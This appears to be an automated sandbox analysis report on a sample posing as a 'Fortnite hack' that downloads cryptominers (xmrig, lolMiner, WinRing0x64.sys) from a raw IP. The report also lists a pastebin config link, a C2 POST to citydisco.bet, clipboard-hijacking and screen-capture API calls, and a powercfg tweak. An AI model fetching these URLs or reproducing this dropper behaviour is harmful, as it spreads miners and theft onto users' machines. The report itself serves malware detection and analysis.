Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51

Source: global traffic	HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic	HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: citydisco.bet
Source: global traffic	DNS traffic detected: DNS query: pastebin.com

Source: unknown

HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 57Host: citydisco.bet

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 12:35:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closex-frame-options: DENYx-frame-options: DENYx-content-type-options: nosniffx-content-type-options: nosniffx-xss-protection: 1;mode=blockx-xss-protection: 1;mode=blockcache-control: public, max-age=1801CF-Cache-Status: HITAge: 99Server: cloudflareCF-RAY: 91fb9292be86f60c-ORD

Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51
Source: FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/
Source: FortniteHack.exe1.exe, 00000002.00000002.2435175433.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/52
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WatchDog.exe
Source: FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	String found in binary or memory: http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/WinRing0x64.sys
Source: FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	String found in binary or memory: http://185.215.113.51/WinRing0x64.sysChttps://pastebin.com/raw/YpJeSRBC
Source: FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2434699473.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exe
Source: FortniteHack.exe1.exe, 00000002.00000002.2433881762.0000000000AFB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exeP
Source: FortniteHack.exe1.exe, 00000002.00000002.2434699473.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exeY
Source: FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435620195.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/conhost.exem
Source: FortniteHack.exe1.exe, 00000002.00000002.2435175433.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/e
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/lolMiner.exe
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51/xmrig.exe
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003499000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.51H
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.00000000034A8000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.15.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.00000000034A8000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.15.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.00000000034A8000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.15.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.00000000034A8000.00000004.00000800.00020000.00000000.sdmp, WinRing0x64.sys.15.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2434699473.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335692308.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.p
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.coml
Source: powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003426000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1451324562.0000000004941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1493079682.0000000006D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cE
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000012.00000002.1451324562.0000000004941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FortniteHack.exe1.exe, 00000002.00000003.1358983072.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/
Source: FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1358983072.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1247770879.0000000000C66000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1306374340.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1246756203.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1247756802.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1276871245.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS
Source: FortniteHack.exe1.exe, 00000002.00000003.1246756203.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJIS-
Source: FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISHm
Source: FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISPrZo
Source: FortniteHack.exe1.exe, 00000002.00000003.1247756802.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1276871245.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISX$
Source: FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://citydisco.bet/gdJISl
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20R
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e
Source: powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp, logs.uce.15.dr, logs.uce1.15.dr, logs.uce0.15.dr	String found in binary or memory: https://pastebin.com/raw/YpJeSRBC
Source: FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: FortniteHack.exe1.exe, 00000002.00000003.1279065051.00000000035BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.5iSPD7jwkDnW
Source: FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.3UfcDFx2ZSAZ
Source: FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49684 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.12:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.12:49704 version: TLS 1.2

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 2_2_0043E240 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043E240

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 2_2_02B31000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

2_2_02B31000

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 2_2_0043E240 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

2_2_0043E240

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe

Code function: 2_2_0043E3D0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_0043E3D0

System Summary

Uses powercfg.exe to modify the power settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

File created: C:\ProgramData\Dllhost\WinRing0x64.sys

Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00ED4CB0	0_2_00ED4CB0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00ED6460	0_2_00ED6460
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00E9553B	0_2_00E9553B
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EB1F50	0_2_00EB1F50
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EA50E0	0_2_00EA50E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EB00E0	0_2_00EB00E0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EAA0F0	0_2_00EAA0F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EE90F0	0_2_00EE90F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EEE0F0	0_2_00EEE0F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EFB0F0	0_2_00EFB0F0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EB28C0	0_2_00EB28C0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EB98A0	0_2_00EB98A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00ED78A0	0_2_00ED78A0
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00ED6090	0_2_00ED6090
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EAF860	0_2_00EAF860
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00ECC870	0_2_00ECC870
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00ECD070	0_2_00ECD070
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EED070	0_2_00EED070
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EA3840	0_2_00EA3840
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EEC050	0_2_00EEC050
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00E95856	0_2_00E95856
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EBE020	0_2_00EBE020
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00E9E030	0_2_00E9E030
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EFA030	0_2_00EFA030
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00E91000	0_2_00E91000
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Code function: 0_2_00EF2800	0_2_00EF2800
